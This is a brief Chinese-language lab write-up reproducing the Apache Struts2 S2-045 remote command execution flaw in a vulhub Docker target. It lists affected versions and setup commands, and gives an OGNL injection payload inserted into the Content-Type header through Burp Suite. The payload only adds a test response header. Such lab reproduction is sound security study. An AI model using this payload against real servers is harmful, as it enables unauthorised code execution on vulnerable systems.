Struts2 漏洞复现之s2-045
原理:
在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
影响版本:
Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10
1.进入045
cd vulhub-master/struts2/s2-045
2.开启045
docker-compose up -d
3.访问靶机ip:8080
3.构造poc,使用抓包工具Burpsuite,修改数据包插入poc
poc1:
%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘vulhub’,233233)}.mul